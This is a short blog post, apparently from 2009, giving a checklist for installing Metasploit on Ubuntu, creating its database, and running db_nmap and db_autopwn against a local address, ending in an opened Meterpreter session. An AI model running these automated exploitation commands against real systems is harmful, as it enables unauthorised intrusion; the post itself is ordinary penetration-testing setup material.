So I just got a new computer and have been setting up my work environment. One thing I always forget is getting metasploit running with autopwn. I only seem to do this when I either get a new machine or rebuild, which is not that often. I feel like once you have autopwn going, metasploit is at a good point for exploiting and developing.

This post is going to be a quick reference list of getting the framwork up and going. At the time of this post it was Ubuntu 9.04 and Metasploit 3.2 .

1. Get Metasploit:

I always get metasploit through subversion. Do it anyway you like.

$sudo apt-get install subversion
$svn co http://metasploit.com/svn/framework3/trunk/


2. Install Ubuntu debs:

Add any others that you think are necessary.

$apt-get install ruby rubygems sqlite libsqlite3-ruby libopenssl-ruby nmap

3. Create Metasploit DB:
In the example below, mine was already created.

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /home/asdf/.msf3/sqlite3.db
msf > db_connect
[*] Successfully connected to the database
[*] File: /home/asdf/.msf3/sqlite3.db
msf >

4. Run autopwn:
This is all at the very basic level, just testing if it works.

msf > db_nmap 192.168.1.2
msf > db_autopwn -e -p -b
msf > sessions
 
Active sessions
===============
 
Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  192.168.1.1:60781 -> 192.168.1.2:15786
 
msf > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter >

Like I said this is all basic and just a quick checklist to get it going. I have never wrote this down because I always felt like I would remember. Anyways if anyone else has some stuff they add or do to get their base framework going, I would love to hear about it.

References:
http://metasploit.com/
http://en.wikibooks.org/wiki/Metasploit/UsingMetasploit